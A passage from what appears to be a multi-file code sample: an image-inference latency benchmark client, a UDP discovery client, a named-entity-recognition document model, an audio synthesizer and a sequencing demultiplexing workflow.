Sends the raw image data with a 'Content-Type' of 'image/jpeg'.
"""
# headers = {'Content-Type': 'image/jpeg', "Mobiledgex-Debug": "true"} # Enable saving debug images
headers = {'Content-Type': 'image/jpeg'}
return requests.post(self.url, data=image, headers=headers, verify=self.tls_verify)
def send_image_json(self, image):
"""
Base64 encodes the image, and sends it as the "image" value
        in the JSON parameter set. Content-Type=application/x-www-form-urlencoded
"""
data = {'image': base64.b64encode(image)}
        if self.json_params is not None:
params = json.loads(self.json_params)
data.update(params)
return requests.post(self.url, data=data)
class PersistentTcpClient(Client):
def __init__(self, host, port=8011):
if port is None:
port = 8011
Client.__init__(self, host, port)
def start(self):
Client.start(self)
if self.endpoint == "/detector/detect/":
op_code = 1
elif self.endpoint == "/recognizer/predict/":
op_code = 2
elif self.endpoint == "/openpose/detect/":
op_code = 3
elif self.endpoint == "/object/detect/":
op_code = 4
else:
logger.error("Unknown endpoint: %s" %self.endpoint)
return
# Open the connection one time, then send the image data multiple times.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
logger.info("host:port = %s:%d" %(self.host, self.port))
sock.connect((self.host, self.port))
logger.debug("repeating %s %d times" %(op_code, self.num_repeat))
while True:
data = self.get_next_image()
if data is None:
break
length = len(data)
logger.debug("data length = %d" %length)
self.latency_start_time = time.time()
sock.sendall(struct.pack('!I', op_code))
sock.sendall(struct.pack('!I', length))
sock.sendall(data)
lengthbuf = sock.recv(4)
length, = struct.unpack('!I', lengthbuf)
result = str(sock.recv(length), "utf-8")
self.process_result(result)
if (self.stats_latency_full_process.n) % PING_INTERVAL == 0:
if self.do_server_stats:
self.get_server_stats()
if self.net_latency_method == "SOCKET":
self.time_open_socket()
else:
self.icmp_ping()
logger.debug("Done")
self.display_results()
def recvall(sock, count):
buf = b''
while count:
newbuf = sock.recv(count)
if not newbuf: return None
buf += newbuf
count -= len(newbuf)
return buf
class WebSocketClient(Client):
def __init__(self, host, port=8008):
if port is None:
port = 8008
Client.__init__(self, host, port)
def start(self):
Client.start(self)
url = "ws://%s:%s/ws%s" %(self.host, self.port, self.endpoint)
if self.tls:
url = url.replace("ws", "wss", 1)
logger.debug("url: %s" %url)
ws = websocket.WebSocketApp(url,
on_message = lambda ws,msg: self.on_message(ws, msg),
on_error = lambda ws,msg: self.on_error(ws, msg),
on_close = lambda ws: self.on_close(ws),
on_open = lambda ws: self.on_open(ws))
# websocket.enableTrace(True)
if self.tls_verify:
ws.run_forever()
else:
ws.run_forever(sslopt={"cert_reqs": ssl.CERT_NONE})
def on_message(self, ws, message):
# As each response is received, process the response, then send the next image.
# logger.info("on_message: %s loop_count: %s", %(message,self.loop_count))
self.process_result(message)
self.loop_count += 1
if self.loop_count % (PING_INTERVAL+1) == 0:
if self.do_server_stats:
self.get_server_stats()
# ignore self.net_latency_method because any other type of
# network activity seems to lock up the websocket.
# Text payload gets echoed back. See how long it takes.
payload = json.dumps({"latency_start": time.time()})
ws.send(payload)
return
image = self.get_next_image()
if image is None:
logger.debug("repeating done")
self.display_results()
ws.close()
return
logger.debug("loop_count: %d media_file_name: %s filename_list_index: %s num_repeat: %s count_latency_full_process: %s" %(self.loop_count, self.media_file_name, self.filename_list_index, self.num_repeat, self.stats_latency_full_process.n))
self.latency_start_time = time.time()
ws.send(image, WEBSOCKET_OPCODE_BINARY)
def on_error(self, ws, error):
logger.info("on_error: %s" %error)
def on_close(self, ws):
logger.info("on_close")
def on_open(self, ws):
# As soon as the websocket is open, send the first image.
image = self.get_next_image()
self.loop_count += 1
self.latency_start_time = time.time()
ws.send(image, WEBSOCKET_OPCODE_BINARY)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-s", "--server", required=True, help="Server host name or IP address.")
parser.add_argument("-e", "--endpoint", required=True, choices=["/detector/detect/", "/recognizer/predict/", "/openpose/detect/", "/object/detect/", "/trainer/add/", "/trainer/predict/"], help="Endpoint of web service to call.")
parser.add_argument("-n", "--network-latency", required=False, choices=["PING", "SOCKET"], default="SOCKET", help="Network-only latency test method.")
parser.add_argument("-c", "--connection-method", required=True, choices=["rest", "socket", "websocket"], help="Connection type.")
parser.add_argument("-f", "--filename", required=False, help="Name of image file to send.")
parser.add_argument("-d", "--directory", required=False, help="Directory containing image files to send (*.jpg, *.png).")
parser.add_argument("-r", "--repeat", type=int, default=1, help="Number of times to repeat.")
parser.add_argument("-t", "--threads", type=int, default=1, help="Number of concurrent execution threads.")
parser.add_argument("--skip-frames", type=int, default=1, help="For video, send every Nth frame.")
parser.add_argument("-p", "--port", type=int, help="Port number")
parser.add_argument("-j", "--json-params", required=False, help='Extra parameters to include with image. Ex: {"subject":"Max Door", "owner":"Bruce Armstrong"}')
parser.add_argument("--fullsize", action='store_true', help="Maintain original image size. Default is to shrink the image before sending.")
parser.add_argument("--base64", action='store_true', help="Base64 encode image")
parser.add_argument("--tls", action='store_true', help="Use https connection")
parser.add_argument("--noverify", action='store_true', help="Disable TLS cert verification")
parser.add_argument("--show-responses", action='store_true', help="Show responses.")
parser.add_argument("--server-stats", action='store_true', help="Get server stats every Nth frame.")
args = parser.parse_args()
if args.threads > 1:
Client.MULTI_THREADED = True
    threads = []
    for x in range(args.threads):
if args.connection_method == "rest":
client = RestClient(args.server, args.port)
elif args.connection_method == "socket":
client = PersistentTcpClient(args.server, args.port)
elif args.connection_method == "websocket":
client = WebSocketClient(args.server, args.port)
else:
# This should be impossible because the ArgumentParser enforces a valid choice.
logger.error("Unknown connection-method: %s" %args.connection_method)
sys.exit()
if args.base64 and args.connection_method != "rest":
logger.warning("base64 parameter ignored for %s" %args.connection_method)
if args.filename != None and args.directory != None:
logger.error("Can't include both filename and directory arguments")
parser.print_usage()
sys.exit()
if args.filename != None:
client.filename_list.append(args.filename)
elif args.directory != None:
valid_extensions = ('jpg','jpeg', 'png')
files = os.listdir(args.directory)
for file in files:
if file.endswith(valid_extensions):
client.filename_list.append(args.directory+"/"+file)
else:
logger.error("Must include either filename or directory argument")
parser.print_usage()
sys.exit()
client.filename_list_index = -1
client.num_repeat = args.repeat * len(client.filename_list)
client.do_server_stats = args.server_stats
client.show_responses = args.show_responses
client.endpoint = args.endpoint
client.json_params = args.json_params
client.base64 = args.base64
client.net_latency_method = args.network_latency
client.resize = not args.fullsize
client.skip_frames = args.skip_frames
client.tls = args.tls
client.tls_verify = not args.noverify
        thread = Thread(target=client.start)
        thread.start()
        threads.append(thread)
        logger.debug("Started %s" %thread)
        time.sleep(0.5) # stagger threads
    # Join all client threads before computing the grand totals.
    for thread in threads:
        thread.join()
if Client.stats_latency_full_process.n + Client.stats_latency_network_only.n + Client.stats_server_processing_time.n > 0:
header1 = "Grand totals for %s %s %s" %(args.server, args.endpoint, args.connection_method)
header2 = "%d threads repeated %d times on %d files. %d total frames." %(args.threads, args.repeat, len(client.filename_list), Client.stats_latency_full_process.n)
separator = ""
for s in header1: separator += "="
logger.info(separator)
logger.info(header1)
logger.info(header2)
logger.info(separator)
if Client.stats_latency_full_process.n > 0:
logger.info("====> Average Latency Full Process=%.3f ms (stddev=%.3f)" %(Client.stats_latency_full_process.mean(), Client.stats_latency_full_process.stddev()))
if Client.stats_latency_network_only.n > 0:
logger.info("====> Average Latency Network Only=%.3f ms (stddev=%.3f)" %(Client.stats_latency_network_only.mean(), Client.stats_latency_network_only.stddev()))
if Client.stats_server_processing_time.n > 0:
logger.info("====> Average Server Processing Time=%.3f ms (stddev=%.3f)" %(Client.stats_server_processing_time.mean(), Client.stats_server_processing_time.stddev()))
# The following line outputs CSV data that can be imported to a spreadsheet.
#print("%s,%s,%.3f,%.3f" %((args.server, args.filename, file_size, Client.stats_latency_full_process.mean(), Client.stats_latency_network_only.mean())))
logger.info("TEST_PASS=%r" %TEST_PASS)
else:
logger.info("No results")
|
broadcast_client.py
|
import socket
import time
import threading
from threading import Thread
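# Simple UDP broadcast discovery client: send() repeatedly broadcasts b"DISCOVER" to
# port 9000 until an answer arrives, and loop() blocks on port 9001 until a b'ACK'
# reply is received, then returns the responding server's IP address.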
class udpclient():
def __init__(self):
self.AMOUNT_BYTES = 1024
self.BROADCAST_PORT_SEND = 9000
BROADCAST_PORT_RECV = 9001
BROADCAST_LISTEN = ''
self.BROADCAST_SEND = '<broadcast>'
#SOCKET TO RECEIVE MSG
self.bsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.bsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.bsock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
self.bsock.bind((BROADCAST_LISTEN,BROADCAST_PORT_RECV))
self.teste = 0
def loop(self):
t1 = threading.Thread(target=self.send)
t1.start()
while True :
message , address = self.bsock.recvfrom(self.AMOUNT_BYTES)
if message == b'ACK':
self.teste = 1
return address[0]
def send(self):
while self.teste == 0:
self.bsock.sendto(b"DISCOVER", (self.BROADCAST_SEND, self.BROADCAST_PORT_SEND))
time.sleep(5)
|
document_entity.py
|
"""
Name: arXiv Intelligence NER Web Service
Authors: Jonathan CASSAING
Web service specialized in Named Entity Recognition (NER), in Natural Language Processing (NLP)
"""
import json
import sys
from datetime import datetime
from multiprocessing import Process
from pathlib import Path
from sqlalchemy import Column, Integer, String
from web_service.common.base import Base, session_factory
from web_service.common.config import Config
from web_service.services.spacy_ner_service import SpacyNerService
from web_service.services.aws_comprehend_ner_service import AwsComprehendNerService
from .named_entity import NamedEntityRelationshipEnum, NamedEntityScoreEnum, NamedEntityEncoder
class DocumentEntity(Base):
"""Class for representing a generic document entity and his Data Access Object
"""
# Table name in the database
__tablename__ = "document"
# Internal ID is used to store the real ID (in database) after the session close
internal_id = None
# ID primary key in the database
    # Note: this id is wiped after a session.close()
id = Column("id", Integer, primary_key=True)
# Status column in the database
status = Column("status", String(255))
# Uploaded date and time column in the database
uploaded_date = Column("uploaded_date", String(255))
# Author PDF meta data
author = Column("author", String(255))
# Creator PDF meta data
creator = Column("creator", String(255))
# Producer PDF meta data
producer = Column("producer", String(255))
    # Subject PDF meta data
subject = Column("subject", String(255))
# Title PDF meta data
title = Column("title", String(255))
# Pages count PDF meta data
number_of_pages = Column("number_of_pages", Integer)
# Raw informations PDF meta data
raw_info = Column("raw_info", String())
# Content column in the database
content = Column("content", String)
# Named entities extracted in json format
named_entities = Column("named_entities", String())
def __init__(self: object, config: Config):
"""Initialize the object"""
self.config = config
@staticmethod
def _binary_search(named_entities, target_begin_offset):
"""This algorithm is a binary search
It search in the named_entities list,
the named entity which match with target_begin_offset.
The named_entities list must be sorted by begin_offset field
Args:
named_entities (list<NamedEntity>): list where search the offset.
target_begin_offset (int): offset to search in the list.
Returns:
index: the index of the offset searched,
otherwise the nearest index if the offset was not found,
None in case of error.
named_entity: the named_entity matching with the specified offset,
otherwise - returns None.
"""
aaa = 0
bbb = len(named_entities)
if bbb == 0:
# If the list is empty, we leave
return None, None
while bbb > aaa + 1:
mmm = (aaa + bbb) // 2
if named_entities[mmm].begin_offset > target_begin_offset:
bbb = mmm
else:
aaa = mmm
if named_entities[aaa].begin_offset == target_begin_offset:
return aaa, named_entities[aaa]
if named_entities[aaa].begin_offset > target_begin_offset:
nearest_index = aaa
else:
nearest_index = bbb
return nearest_index, None
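    # Worked example (illustrative offsets): for entities with begin_offset values
    # [3, 10, 42], searching for 10 returns (1, <entity at 10>); searching for 20
    # returns (2, None), index 2 being the nearest insertion point.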
def _merge(self, named_entities_1, named_entities_2) -> list:
"""Merge distinct the two named_entities_1 and named_entities_2 lists
These two lists must be sorted by begin_offset field
Args:
named_entities_1 (list<NamedEntity>): list to merge.
named_entities_2 (list<NamedEntity>): list to merge.
Returns:
list<NamedEntity>: merged list.
"""
# First, we search the smallest list
if len(named_entities_1) < len(named_entities_2):
smallest_list = named_entities_1
biggest_list = named_entities_2
else:
smallest_list = named_entities_2
biggest_list = named_entities_1
# We merge each element of the smallest list in the biggest list
for named_entity in smallest_list:
# We search the named_entity in the biggest list
index, named_entity_searched = self._binary_search(
biggest_list,
named_entity.begin_offset
)
if index is not None:
# If we have found it and the text match the current named entity
# No need to insert
if named_entity_searched is not None \
and (named_entity_searched.text == named_entity.text):
# But we just keep the aws_score (if exist)
try:
if named_entity.aws_score is not None:
named_entity_searched.aws_score = named_entity.aws_score
except AttributeError:
pass
# Also, we increment the score
if named_entity_searched.score == NamedEntityScoreEnum.LOW:
named_entity_searched.score = NamedEntityScoreEnum.MEDIUM
elif named_entity_searched.score == NamedEntityScoreEnum.MEDIUM:
named_entity_searched.score = NamedEntityScoreEnum.HIGH
                # Else, we have not found the named entity
else:
# So, we insert it as new element in the biggest list
biggest_list.insert(index, named_entity)
return biggest_list
def insert(
self,
uploaded_date: str = None,
author: str = None,
creator: str = None,
producer: str = None,
subject: str = None,
title: str = None,
number_of_pages: int = None,
raw_info: str = None,
content: str = None,
named_entities: str = None):
"""Insert a new object to the database"""
session = session_factory()
self.status = "PENDING"
if uploaded_date is not None:
self.uploaded_date = str(uploaded_date)
if author is not None:
self.author = str(author)
if creator is not None:
self.creator = str(creator)
if producer is not None:
self.producer = str(producer)
if subject is not None:
self.subject = str(subject)
if title is not None:
self.title = str(title)
if number_of_pages is not None:
self.number_of_pages = number_of_pages
if raw_info is not None:
self.raw_info = str(raw_info)
if content is not None:
self.content = str(content)
if named_entities is not None:
self.named_entities = str(named_entities)
session.add(self)
session.commit()
        # We save the ID because it will be wiped after the session.close()
self.internal_id = self.id
session.close()
return self.internal_id
def update(
self,
object_id: int,
status: str = "SUCCESS",
uploaded_date: str = None,
author: str = None,
creator: str = None,
producer: str = None,
subject: str = None,
title: str = None,
number_of_pages: int = None,
raw_info: str = None,
content: str = None,
named_entities: str = None):
"""Update an object in the database"""
session = session_factory()
pdf_entity = session.query(DocumentEntity).get(object_id)
pdf_entity.status = status
if uploaded_date is not None:
pdf_entity.uploaded_date = str(uploaded_date)
if author is not None:
pdf_entity.author = str(author)
if creator is not None:
pdf_entity.creator = str(creator)
if producer is not None:
pdf_entity.producer = str(producer)
if subject is not None:
pdf_entity.subject = str(subject)
if title is not None:
pdf_entity.title = str(title)
if number_of_pages is not None:
pdf_entity.number_of_pages = number_of_pages
if raw_info is not None:
pdf_entity.raw_info = str(raw_info)
if content is not None:
pdf_entity.content = str(content)
if named_entities is not None:
pdf_entity.named_entities = str(named_entities)
session.commit()
        # We save the ID because it will be wiped after the session.close()
        self.internal_id = object_id
session.close()
return self.internal_id
def _async_ner(self, filename: Path, object_id: int):
"""Private method to extract named entities then update a PDF object in the database
You must use insert() without parameter before,
to get the id of your futur line in the database.
Args:
filename (str): filename of the target file
object_id (int): id of the database line to update
Returns:
int: ID of the persisted object in the database.
"""
try:
            # Extracting data and metadata of the document
document = self.extract_document(filename)
except IOError:
print(
"Error: the file", filename.absolute, "does not appear to exist",
file=sys.stderr
)
# Set the ERROR in database
self.update(
object_id,
"ERROR",
datetime.today().strftime("%Y-%m-%d-%H-%M-%S.%f")
)
return self.internal_id
try:
# We extract the named entities
named_entities = self.extract_named_entities(document.content)
# We convert named entities to json
json_named_entities = json.dumps(named_entities, cls=NamedEntityEncoder)
except ValueError as err:
print("Error when extracting named entities:", err)
# Set the ERROR in database
self.update(
object_id,
"ERROR",
datetime.today().strftime("%Y-%m-%d-%H-%M-%S.%f"),
document.author,
document.creator,
document.producer,
document.subject,
document.title,
document.number_of_pages,
document.raw_info,
document.content
)
return self.internal_id
# Saving content to the database
self.update(
object_id,
"SUCCESS",
datetime.today().strftime("%Y-%m-%d-%H-%M-%S.%f"),
document.author,
document.creator,
document.producer,
document.subject,
document.title,
document.number_of_pages,
document.raw_info,
document.content,
json_named_entities
)
return self.internal_id
def extract_named_entities(self, text: str):
"""This method extracted the named entities from the text"""
ner_services = []
ner_methods = self.config.get_ner_methods()
if "aws-comprehend" in ner_methods:
ner_services.append(AwsComprehendNerService(
self.config.get_aws_region(),
self.config.get_max_char_per_aws_request()))
if "nltk" in ner_methods:
print("NLTK NER method not supported yet")
if "spacy" in ner_methods:
ner_services.append(SpacyNerService())
# Now, we must split the text in two parts (before and after "References" key word)
references_word = "References"
splited_text = text.rsplit(references_word, 1)
named_entities = []
# For each NER service
for ner_service in ner_services:
# We get the named entities list
named_entities_quoted = ner_service.extract(
splited_text[0], NamedEntityRelationshipEnum.QUOTED
)
            # Because the 2nd part of the text (i.e. splited_text[1]) starts from 0,
# The NER object will locate the named entities from 0, so we have to set an offset,
# To take account of the first splited text (before references key word)
try:
named_entities_referenced = ner_service.extract(
splited_text[1], NamedEntityRelationshipEnum.REFERENCED,
len(splited_text[0]) + len(references_word)
)
except IndexError:
# If except, the "References" key word has not been found
# So, we empty the named_entities_referenced list
named_entities_referenced = []
# We merge the named entities list with the previous list
named_entities = self._merge(
named_entities, named_entities_quoted+named_entities_referenced
)
return named_entities
def extract_document(self, filename: Path):
"""Method for extracting data and metadata from a document
You must overwrite extract_document() by your own code
if you would extract data and metadata from a specific document.
See PdfEntity for example.
Returns:
document (DocumentEntity): You must fill the following attributes of the document;
author, creator, producer, subject, title, number_of_pages, info, content."""
with open(filename, "r", encoding='utf-8') as file:
# Extracting the text (content)
content = file.read()
document = DocumentEntity(self.config)
document.content = content
return document
def start_ner(self, filename: Path):
"""Start the recognition of named entities
Public method to extract then persist a document in the database
First, this method ask an ID for the futur line in the database, then,
this method create a process for extracting data and
persisting the object in the database.
This method returns the ID of the object in the database
which will be inserted when the process will finish.
This method calls _async_ner() method and execute it in a separated process.
You must overwrite extract_document() by your own code
if you would extract data and metadata from a specific document.
See PdfEntity for example.
Args:
filename (str): filename of the target file
Returns:
int: ID of the persisted object in the database,
otherwise - returns None if the file's type is not supported.
"""
# We persist an empty object just to get the ID of the line in the database
object_id = self.insert()
# We launch the process
process = Process(target=self._async_ner, args=(filename, object_id))
process.start()
# Returning the id in the database
return object_id
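# Hypothetical usage sketch (the file name is an illustrative assumption):
#
#   entity = DocumentEntity(Config())
#   object_id = entity.start_ner(Path("paper.txt"))
#   # poll the database row with this object_id until its status is SUCCESS or ERROR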
class DocumentEncoder(json.JSONEncoder):
"""Class for converting full object to JSON string"""
def default(self, o):
if isinstance(o, DocumentEntity):
doc_id = o.id
            if doc_id is None:
# If None, the object was created after a INSERT query,
# so, the internal_id is the table id
doc_id = o.internal_id
json_named_entities = None
if o.named_entities is not None:
json_named_entities = json.loads(o.named_entities)
return {
"id": doc_id,
"status": o.status,
"uploaded_date": o.uploaded_date,
"author": o.author,
"creator": o.creator,
"producer": o.producer,
"subject": o.subject,
"title": o.title,
"number_of_pages": o.number_of_pages,
"raw_info": o.raw_info,
"content": o.content,
"named_entities": json_named_entities
}
# Base class will raise the TypeError.
return super().default(o)
|
synth.py
|
import wave
import threading
from pathlib import Path
from importlib import import_module
from functools import lru_cache, partial
from contextlib import contextmanager
import numpy as np
import soundcard as sc
SAMPLERATE = 44100 # default sample rate
def sine_wave(duration, frequency, ampl=1.0, samplerate=SAMPLERATE):
frames = int(duration * samplerate)
x = np.linspace(0, duration, frames)
assert len(x) == frames
return (0.5 * ampl) * np.sin(x * frequency * np.pi * 2)
def release_time(atk, dcy, samplelen, samplerate=SAMPLERATE):
return samplelen / samplerate * 1000 - (atk + dcy)
def envelope(attack_time, decay_time, sustain_level, release_time, frames):
assert isinstance(frames, int)
attack_frames = int(frames * attack_time)
decay_frames = int(frames * decay_time)
release_frames = int(frames * release_time)
sustain_frames = frames - attack_frames - decay_frames - release_frames
return np.concatenate([
np.linspace(0, 1, attack_frames),
np.linspace(1, sustain_level, decay_frames),
np.linspace(sustain_level, sustain_level, sustain_frames),
np.linspace(sustain_level, 0, release_frames),
])
def envelope_ms(attack_time, decay_time, sustain_level, release_time, frames, samplerate=SAMPLERATE):
assert isinstance(frames, int)
attack_frames = int(attack_time / 1000 * samplerate)
decay_frames = int(decay_time / 1000 * samplerate)
release_frames = int(release_time / 1000 * samplerate)
padding_frames = frames - attack_frames - decay_frames - release_frames
attack_frames = np.clip(attack_frames, 0, None)
decay_frames = np.clip(decay_frames, 0, None)
release_frames = np.clip(release_frames, 0, None)
padding_frames = np.clip(padding_frames, 0, None)
return np.concatenate([
np.linspace(0, 1, attack_frames),
np.linspace(1, sustain_level, decay_frames),
np.linspace(sustain_level, 0, release_frames),
np.linspace(0, 0, padding_frames)
])[:frames]
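# Illustrative sketch (not called anywhere in this module): shape a 440 Hz tone with a
# 10 ms attack, 50 ms decay to a 0.7 sustain and a release that fills the rest of the buffer.
#
#   tone = sine_wave(0.5, 440)
#   rel = release_time(10, 50, len(tone))
#   shaped = tone * envelope_ms(10, 50, 0.7, rel, len(tone))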
@lru_cache()
def lowpass_noise(cutoff, duration, samplerate=SAMPLERATE):
frames = int(duration*samplerate)
# # low pass filter implementation without fft
# # len(convolution) = len(signal) + len(kernel) - 1
# kernel_half_duration = 1
# t = np.linspace(
# -kernel_half_duration,
# kernel_half_duration,
# 2 * kernel_half_duration * samplerate
# )
# kernel = 2 * cutoff * np.sinc(2 * cutoff * t)
noise = np.random.normal(0, 0.2, frames)
fd_noise = np.fft.rfft(noise)
freq = np.fft.rfftfreq(noise.size, d=1/samplerate)
print(len(freq[freq < cutoff]))
fd_noise[freq > cutoff] = 0
noise = np.fft.irfft(fd_noise)
# noise = np.convolve(noise, kernel)
return noise
@lru_cache()
def bandpass_noise(cutoffl, cutoffh, duration, samplerate=SAMPLERATE):
frames = int(duration*samplerate)
noise = np.random.normal(0, 0.2, frames)
fd_noise = np.fft.rfft(noise)
freq = np.fft.rfftfreq(noise.size, d=1/samplerate)
fd_noise[freq < cutoffl] = 0
fd_noise[freq > cutoffh] = 0
noise = np.fft.irfft(fd_noise)
return noise
class Synth:
def __init__(self, output):
self.output = output
def play(self, *args):
self.play_mix(args)
def play_mix(self, mix):
concatenated = [np.concatenate(list(map(list, waves))) for waves in mix]
longest = len(max(concatenated, key=lambda x: len(x)))
for idx, ary in enumerate(concatenated):
zeros = np.zeros([longest-len(ary)])
concatenated[idx] = np.block([ary, zeros])
self.output.play_wave(sum(concatenated))
def play_wave(self, wave):
self.output.play_wave(wave)
class Queue0:
"""Bufferless Queue"""
def __init__(self):
self.mutex = threading.Lock()
self.not_empty = threading.Condition(self.mutex)
self.not_full = threading.Condition(self.mutex)
self.waiters = 0
self.data = []
def put(self, item, interrupt_delay=None):
with self.not_full:
while not self.waiters:
self.not_full.wait(timeout=interrupt_delay)
self.waiters -= 1
self.data.append(item)
self.not_empty.notify()
def get(self, interrupt_delay=None):
with self.not_empty:
self.waiters += 1
self.not_full.notify()
while not self.data:
self.not_empty.wait(timeout=interrupt_delay)
item = self.data.pop()
return item
def __iter__(self):
return self
def __next__(self):
return self.get()
class SoundcardOutput:
def __init__(self, speaker):
self.speaker = speaker
self.thread = None
def play_wave(self, wave):
self.queue.put(wave, interrupt_delay=0.1)
def __enter__(self):
if self.thread:
raise RuntimeError("already running")
self.queue = Queue0()
self.thread = threading.Thread(target=self._feed_thread, daemon=True)
self.thread.start()
return self
def __exit__(self, *args):
pass
def _feed_thread(self):
for item in self.queue:
self.speaker.play(item)
@contextmanager
def open_sc_stream(samplerate=SAMPLERATE, buffer_duration=1.0):
speaker = sc.default_speaker()
print(speaker)
blocksize = int(samplerate * buffer_duration)
with speaker.player(samplerate=samplerate, blocksize=blocksize) as player:
# player.channels = [-1]
with SoundcardOutput(player) as output:
yield output
class MyBuffer(bytearray):
def play_wave(self, data):
self.extend(np.int16(np.clip(data, -1, 1) * 32767))
def _write_wav_file(filename, sample_rate, stream):
with wave.open(filename, 'wb') as wf:
wf.setnchannels(1)
wf.setsampwidth(2)
wf.setframerate(sample_rate)
wf.setnframes(len(stream))
wf.writeframes(stream)
@contextmanager
def create_wav_file(filename, sample_rate=SAMPLERATE):
stream = MyBuffer()
try:
yield Synth(stream)
finally:
_write_wav_file(filename, sample_rate, stream)
@contextmanager
def open_soundcard_synth(sample_rate=SAMPLERATE):
with open_sc_stream() as stream:
yield Synth(stream)
def run_synth(callable, output=None, **kwargs):
    if output is None:
        context_function = open_soundcard_synth
    elif isinstance(output, str):
        context_function = partial(create_wav_file, output)
    else:
        raise TypeError("output must be None (soundcard playback) or a filename string")
    try:
        with context_function(**kwargs) as synth:
            callable(synth)
    except KeyboardInterrupt:
        pass
if __name__ == "__main__":
# TODO: use argparse
import sys
outfile = None
if len(sys.argv) >= 2:
scorename = sys.argv[1]
if len(sys.argv) == 3:
outfile = sys.argv[2]
# TODO: handle multiple scores with the same name
scorefile = next(f for f in Path('.').glob('**/*.py') if f.stem == scorename)
# scores/ezio/ezio0.py -> scores.ezio.ezio0
module = '.'.join([*scorefile.parent.parts, scorefile.stem])
run_synth(import_module(module).make_music, output=outfile)
|
workflow.py
|
"""Implementation of the workflow for demultiplexing sequencing directories."""
import collections
import csv
import glob
import gzip
import itertools
import json
import logging
import os
import shutil
import subprocess
import sys
from threading import Thread, Lock
import tempfile
import xml.etree.ElementTree as ET
from snakemake.exceptions import WorkflowError
from digestiflow_demux import __version__
from .bases_mask import split_bases_mask, return_bases_mask, BaseMaskConfigException
from .api_client import ApiClient, ApiException
from .exceptions import ApiProblemException, MissingOutputFile
#: Path to the Snakefile.
PATH_SNAKEFILE = os.path.abspath(os.path.join(os.path.dirname(__file__), "Snakefile"))
#: Template for the success message.
TPL_MSG_SUCCESS = r"""
The demultiplexing succeeded for flow cell {flowcell[vendor_id]}.
See the attached files for quality reports.
The following attachments were not present (this is OK for HTML reports that are not generated
by Picard):
{missing_log_files}
--
This message was auto-created by digestiflow-demux v{version}.
"""
#: Template for the failure message.
TPL_MSG_FAILURE = r"""
The attempted demultiplexing for flow cell {flowcell[vendor_id]} has failed.
To try again, clean up any output files and mark as "ready" for demultiplexing again.
--
This message was auto-created by digestiflow-demux v{version}.
"""
def write_sample_sheet_v1(writer, flowcell, libraries):
"""Write V1 sample sheet"""
header = [
"FCID",
"Lane",
"SampleID",
"SampleRef",
"Index",
"Description",
"Control",
"Recipe",
"Operator",
"SampleProject",
]
writer.writerow(header)
demux_reads = flowcell.get("demux_reads") or flowcell["planned_reads"]
demux_reads = split_bases_mask(demux_reads)
lens = [count for base, count in demux_reads if base == "B"]
recipe = "PE_indexing" if demux_reads.count("T") > 1 else "SE_indexing"
for lib in libraries:
if lib["barcode2"]:
barcode = "".join((lib["barcode"][: lens[0]], "-", lib["barcode2"][: lens[1]]))
else:
barcode = lib["barcode"][: lens[0]]
for lane in sorted(lib["lanes"]):
data = [
flowcell["vendor_id"],
lane,
lib["name"],
lib["reference"],
barcode,
"",
"N",
recipe,
flowcell["operator"],
"Project",
]
writer.writerow(list(map(str, data)))
def write_sample_sheets_v2(flowcell, libraries, output_dir):
"""Write V2 sample sheets. Write one sample sheet for each bases_mask in the config."""
# re-shuffle dict from lib - lane - bases_mask to bases_mask - lib
d = collections.defaultdict(dict)
for key, lib in enumerate(libraries):
d[lib.get("demux_reads_override", flowcell["demux_reads"])][key] = lib
for bases_mask, libraries in d.items():
os.makedirs(
os.path.join(output_dir, "illumina_basesmask/{}".format(bases_mask)), exist_ok=True
)
with open(
os.path.join(output_dir, "illumina_basesmask/{}/SampleSheet.csv".format(bases_mask)),
"w",
) as f:
writer = csv.writer(f, delimiter=",")
write_sample_sheet_v2(writer, flowcell, libraries.values())
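# Each distinct bases mask thus gets its own sheet under output_dir, e.g.
# (mask directory names purely illustrative):
#   illumina_basesmask/<bases_mask_1>/SampleSheet.csv
#   illumina_basesmask/<bases_mask_2>/SampleSheet.csv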
def write_sample_sheet_v2(writer, flowcell, libraries):
"""Write V2 sample sheet"""
# Write [Data] Section
writer.writerow(["[Data]"])
dual_indexing = any(library["barcode2"] for library in libraries)
if dual_indexing:
writer.writerow(["lane", "sample_id", "index", "index2", "sample_project"])
else:
writer.writerow(["lane", "sample_id", "index", "sample_project"])
rows = []
for lib in libraries:
for lane in sorted(lib["lanes"]):
barcodes = lib["barcode"].split(",")
for barcode in barcodes:
row = [lane, lib["name"], barcode]
if dual_indexing:
row.append(lib["barcode2"])
row.append("Project")
rows.append(row)
for row in sorted(rows):
writer.writerow(list(map(str, row)))
def write_sample_sheet_picard(flowcell, libraries, output_dir):
"""Write picard sample sheets, one per lane."""
dual_indexing = any(library["barcode2"] for library in libraries)
if not dual_indexing:
head_barcodes = ["barcode_sequence_1", "barcode_name", "library_name"]
head_samplesheet = ["OUTPUT_PREFIX", "BARCODE_1"]
else:
head_barcodes = ["barcode_sequence_1", "barcode_sequence_2", "barcode_name", "library_name"]
head_samplesheet = ["OUTPUT_PREFIX", "BARCODE_1", "BARCODE_2"]
# re-shuffle dict from lib - lane - barcode to lane - lib - barcode because picard works on lanes
d = collections.defaultdict(dict)
for lib in libraries:
for lane in sorted(lib["lanes"]):
d[lane][lib["name"]] = lib
# add Undetermined to samplesheet as picard crashes otherwise
for lane in d:
d[lane]["Undetermined"] = {"name": "Undetermined", "barcode": "N", "barcode2": ""}
if dual_indexing:
d[lane]["Undetermined"]["barcode2"] = "N"
for lane, libraries in d.items():
barcode_rows = []
samples_rows = []
for lib in libraries.values():
            output_prefix = "{lane}/{name}".format(name=lib["name"], lane=lane)
if dual_indexing:
                # We do not pass the barcode names, so we use the sample name.
barcode_row = [lib["barcode"], lib["barcode2"], lib["name"], lib["name"]]
samples_row = [output_prefix, lib["barcode"], lib["barcode2"]]
else:
barcode_row = [lib["barcode"], lib["name"], lib["name"]]
samples_row = [output_prefix, lib["barcode"]]
# barcode file should not contain dummy for unbarcoded reads, but samplesheet must.
if not lib["name"] == "Undetermined":
barcode_rows.append(barcode_row)
samples_rows.append(samples_row)
os.makedirs(os.path.join(output_dir, "picard_barcodes/{}".format(lane)), exist_ok=True)
with open(
os.path.join(output_dir, "picard_barcodes/{}/barcodes.txt".format(lane)), "w"
) as bf, open(
